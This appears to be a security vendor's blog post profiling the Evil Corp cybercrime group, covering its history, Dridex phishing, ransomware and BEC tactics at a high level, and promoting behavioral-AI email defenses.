Evil Corp: Anatomy of a Modern Cybercriminal Organization

Evil Corp, also known as UNC2165, GOLD DRAKE, or Indrik Spider, is a notorious hacker group responsible for the Dridex malware and much more. Maksim Yakubets, their leader, and their affiliates are all masters of social engineering and email phishing.

CISOs and security teams who understand their operations know how such tools evade traditional security defenses. That’s why 35% of attackers disseminating malware deliver it almost exclusively through email.

In this blog, we explore Evil Corp's playbook and examine their tactics, evolution, and impact on global cybersecurity.

Evil Corp has been in operation for over a decade and has evolved into one of the most sophisticated digital criminal enterprises.

Their history and growth demonstrate a methodical approach:

• Founded in 2007, when Maksim Yakubets (known as 'Aqua') began his digital crime operations.

• Formed “The Business Club” between 2011 and 2014, targeting UK banking credentials with fellow Russian cybercriminals.

• Developed and deployed the famous Dridex malware (related to Cridex and the Bugat trojan horse) by 2014.

Evil Corp stole over $100 million from financial institutions in over 40 countries using malware propagation.

Their approach to data breaches revealed critical gaps in today's security stacks and how to close them.

Evil Corp attacks focus on three main threat vectors executed with surgical precision: phishing, ransomware, and business email compromise (BEC).

Together with refined methods for bypassing multi-factor authentication, traditional security measures fell short.

Phishing Email Campaigns

Evil Corp conducts highly specialized phishing operations that include complex development and distribution:

• Emails personalized for individuals and specific industries, primarily healthcare.

• Malicious attachments or malware-linked content that infiltrate the target environment.

• Spear-phishing emails used to deliver payloads that lead to the installation of malware.

• SocGholish framework implementation to disguise malware as legitimate updates

• Use of fileless malware to evade traditional antivirus software detection.

Their signature tool, Dridex banking trojan, specializes in stealing credentials and financial data. Dridex is distributed using massive phishing email campaigns that send millions of messages per day.

Targets receive seemingly legitimate emails. In reality, these emails are impersonation attacks containing infected Office documents attached to the body of the message. Once the attachment opens with enabled macros, Dridex is installed.

Using a keylogger, attackers steal credentials and send them to a remote Evil Corp server. Recognizing and responding to complex phishing attacks is challenging, as users rarely perceive what has just happened.

Ransomware Attacks

Evil Corp’s ransomware operations are multi-phase modular attacks that adapt to different defensive environments, customizing each attack. Variants such as BitPaymer were designed to go undetected.

Evil Corp then switched to Cobalt Strike for lateral movement and SocGholish for initial access, actively staying ahead of threat researchers and law enforcement.

This flexibility and strategic planning often left organizations with few options beyond ransom payments. Data theft before deploying ransomware was also often used for extra leverage.

Business Email Compromise Tactics

Evil Corp’s BEC operations employ advanced account takeover and financial manipulation techniques:

• Advanced credential harvesting using Dridex's keylogging capabilities to gain authentic access.

• Man-in-the-middle attacks that manipulate invoices and payments with legitimate-looking modifications.

• Established money mule networks make fund recovery nearly impossible once transactions are complete.

• Executive impersonation meant to deceive employees and initiate unauthorized transactions.

Financial departments are often targeted, exploiting trust and legitimate processes to siphon funds without triggering traditional security alerts.

Traditional security service measures consistently fail against Evil Corp due to fundamental limitations such as:

• Signature-Based Detection Failures: Legacy security tools cannot keep pace with rapid code alterations. Reliance on known signatures and rules was easily bypassed with updated malware code.

• Living-Off-The-Land Techniques: Their activities appear normal in security logs as legitimate, already present systems were used. Known, good programs execute malicious code while blending attack traffic with legitimate network activity.

• Critical Infrastructure Targeting: Sectors with complex security requirements and severe consequence potential are ideal targets. Healthcare, infrastructure, and government systems are prime examples.

• Jurisdictional Protection Barriers: Russia's reluctance to extradite cybercriminals creates a haven for Evil Corp operations, protected by geographical and political boundaries.

• Sanction Evasion Capabilities: Following the 2019 sanctions, threat actors changed tactics to avoid scrutiny, demonstrating that conventional punishment mechanisms only force adaptation, not cessation of activities.

Emerging AI Attack Methods

While there's no public confirmation that Evil Corp specifically uses AI cyberattacks yet, the trend among sophisticated cybercriminals includes developing:

• More convincing AI-generated phishing content.

• Faster vulnerability identification and exploitation.

• Evasion techniques that learn from defensive measures.

Such capabilities represent a significant challenge for CISOs and security teams, unless combated with equally powerful behavioral AI solutions.

Fighting sophisticated threats like Evil Corp requires a fundamental shift from reactive to proactive security approaches that anticipate attack patterns. Maximize inbound email security with features such as:

Preemptive Threat Hunting Capabilities

Active threat hunting is critical for the early detection of complex attacks. Rather than waiting for alarms to sound, organizations must systematically search their networks for signs of data leaks or compromise.

It’s not uncommon for attackers to hide in networks for months before striking. This approach significantly reduces dwell time for attackers within the network perimeter.

Strategic Threat Intelligence Integration

Understanding attacker methodologies enables proactive defense alignment before they occur. When your security team understands how threat actors like Evil Corp operate and evolve, you can align your defenses before they strike.

Behavioral Baseline Monitoring Systems

Understanding normal network behavior patterns enables rapid anomaly identification. Your security stack needs to establish what "normal" looks like for users, systems, and networks to quickly spot what doesn't belong.

AI behavioral analysis excels here, learning patterns, adapting to new threats, and providing critical context for security alerts.

Advanced AI Security Solutions

AI security tools provide adaptive defense capabilities that match evolving threats, with critical advantages:

• Real-time threat detection as attacks unfold, not hours or days later.

• Reduced false positives through pattern recognition.

• Scalable protection across complex network environments.

• Automated response capabilities that close detection-action gaps.

Organizations that are enhancing cybersecurity with AI stay ahead of sophisticated threats. Payloadless malware is on the rise, where an attacker will send a fake payment receipt over email and then request a follow-up via phone.

Lacking payload (no .exe files or malware links), such attacks often go undetected by traditional secure email gateways (SEGs).

Adaptive Security Architecture Development

Security requires evolution to remain effective. CISOs must implement systems that learn and adapt, include regular protocol updates, and provide ongoing threat training.

AI security agent technology integration allows staying ahead of evolving attack techniques.

Multi-Sector Collaboration Networks

Collective defense efforts multiply intelligence and response capabilities, but require:

• Public-private partnerships delivering better threat intelligence.

• Stronger international frameworks for prosecution.

• Cross-border collaboration between security firms and law enforcement.

AI threat detection enables organizations to stay ahead of intelligent adversaries. Behavioral AI is highly effective against known and upcoming threat patterns that organizations like Evil Corp prefer.

Credential Theft and Account Takeover Prevention

Behavioral AI spots unusual account activities even when valid credentials are used. It identifies suspicious actions like bulk data downloads, unusual access times, or abnormal transaction patterns.

For organizations focused on preventing account takeover, behavioral AI provides critical detection capabilities.

If Evil Corp uses stolen executive credentials for wire transfers, behavioral AI recognizes that the timing, amounts, and destinations don't match the executive's normal patterns, triggering automated protective measures.

Multi-Factor Behavioral Authentication Enforcement

AI systems create dynamic identity verification beyond static credentials. Rather than relying solely on passwords or tokens, behavioral AI continually authenticates users based on their interactions with systems: keystroke dynamics, navigation patterns, and typical workflows.

This approach prevents Evil Corp from successfully using stolen credentials by recognizing subtle differences between legitimate users and attackers attempting to mimic them.

Automated Threat Containment Response

Behavioral AI takes immediate protective action when threats appear, without waiting for human intervention:

• Isolates suspicious users from sensitive systems.

• Terminates compromised sessions.

• Requires additional authentication factors.

• Alerts security teams with contextual information.

Continuous Learning and Adaptation Capabilities

Behavioral AI improves defense effectiveness over time through ongoing pattern analysis. The system constantly refines its understanding of normal behaviors, reducing false alarms while improving threat detection accuracy.

As Evil Corp modifies their tactics, including the use of new tools like phishing kits, the AI adapts in parallel, learning from each attempt and strengthening defenses against similar future attacks without requiring manual updates.

Contextual Alert Prioritization

Behavioral AI reduces alert fatigue by differentiating between critical and minor anomalies. The system evaluates suspicious activities within their full context, considering factors like:

• User role and normal privileges.

• Sensitivity of accessed resources.

• Historical behavior patterns.

• Temporal relationships between activities.

Behavioral AI is the most effective defense against advanced threats used by organizations such as Evil Corp. Spotting unusual behavior, even with valid credentials, provides critical protection where other tools fail.

Abnormal is on a mission to protect people with behavioral AI. We’re using advanced AI to protect what matters most: the human targets.

According to Abnormal’s research, “Within the next few years, malware will have advanced techniques built in that will allow it to recognize the system it is in and morph itself to defend against, or even avoid, current detection systems.”

If you’re ready to secure your organization from threats that bypass traditional security, schedule a demo to see how Abnormal identifies and stops attacks others miss.